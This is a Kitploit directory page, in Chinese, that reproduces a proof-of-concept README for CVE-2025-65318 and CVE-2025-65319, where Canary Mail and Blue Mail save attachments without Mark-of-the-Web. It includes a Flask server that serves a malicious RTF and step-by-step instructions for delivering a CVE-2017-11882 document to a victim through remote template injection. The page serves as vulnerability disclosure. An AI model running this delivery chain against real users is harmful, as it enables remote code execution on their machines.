Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-65318-and-CVE-2025-65319 — 使用 Canary Mail 或 Blue mail 时存在不安全的附件处理。 | Kitploit
工具/GitHubGitHub/bbaboha/cve-2025-65318-and-cve-2025-65319
漏洞分析漏洞利用Web应用程序漏洞利用恶意软件分析渗透测试学习与教育
GitHubbbaboha/cve-2025-65318-and-cve-2025-65319

CVE-2025-65318-and-CVE-2025-65319

使用 Canary Mail 或 Blue mail 时存在不安全的附件处理。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
728个月前尚未审核
分享

CVE-2025-65318 和 CVE-2025-65319 的概念验证(PoC)

  • CVE-2025-65318(BDU:2025-13740): 使用附件交互功能时,Canary Mail 5.1.40 及更低版本将文档保存到文件系统时未添加 Mark-of-the-Web 标记,从而允许攻击者绕过 Windows 操作系统及第三方软件的内置文件保护机制。
  • CVE-2025-65319(BDU:2025-13739): 使用附件交互功能时,Blue Mail 1.140.103 及更低版本将文档保存到文件系统时未添加 Mark-of-the-Web 标记,从而允许攻击者绕过 Windows 操作系统及第三方软件的内置文件保护机制。

概述

核心问题并非用户打开恶意附件,而是诸如 Canary Mail 或 Blue Mail 之类的应用提供了一种便捷但不安全的保存或打开附件功能。我认为这是一项安全漏洞,它使用户暴露于攻击者面前。

CWE-693 - 防护机制失效

PoC

为了演示通过“打开方式”或“另存为”对话框不安全地打开 Office Word 附件,利用了 Office Word 16 及更低版本中公式编辑器(Equation Editor)的漏洞 CVE-2017-11882。

  1. 在攻击者主机上创建一个恶意的 RTF 对象,该对象利用此脚本打开受害主机上的计算器。
  2. 部署一台服务器,通过远程模板注入发送恶意 RTF 文档。
root@kitploit:~
from flask import Flask, send_file, request
import logging
from datetime import datetime

app = Flask(__name__)

# 配置日志记录
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

@app.before_request
def log_request_info():
    logger.info(f'请求: {request.method} {request.url} 来自 {request.remote_addr}')

@app.after_request
def log_response_info(response):
    logger.info(f'响应: {request.url} 状态码 {response.status_code}')
    return response

@app.route('/download')
def download_file():
    try:
        response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
        logger.info('文件下载成功')
        return response
    except FileNotFoundError:
        logger.error('未找到文件 exploit.rtf')
        return '文件未找到', 404

if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0', port=5000)

  1. 创建一个任意的 DOCX 文档,并通过远程模板注入,例如运行 PowerShell 脚本来实现。
  2. 攻击者将生成的恶意 DOCX 文档发送给受害者。
  3. 受害者使用 Canary Mail/Blue Mail 中的“打开方式”或“另存为”功能打开该恶意文档。
  4. 打开恶意文档时,受害者无需点击任何额外按钮即可被攻陷。

影响

对于使用 Microsoft Office Word 16 及更低版本过时软件的用户,存在潜在远程代码执行(RCE)风险。

受影响的版本

  • Canary Mail 5.1.40 及更低版本
  • Blue Mail 1.140.103 及更低版本

视频 PoC

CVE-2025-65318

https://github.com/user-attachments/assets/fc99d603-f56f-451b-a9f2-821422feef61

CVE-2025-65319

https://github.com/user-attachments/assets/68b638b9-e906-4c78-baae-84a369f807f3

参考

  • https://bdu.fstec.ru/vul/2025-13739
  • https://bdu.fstec.ru/vul/2025-13740

免责声明

本仓库仅用于教育和防御性安全研究。

下载工具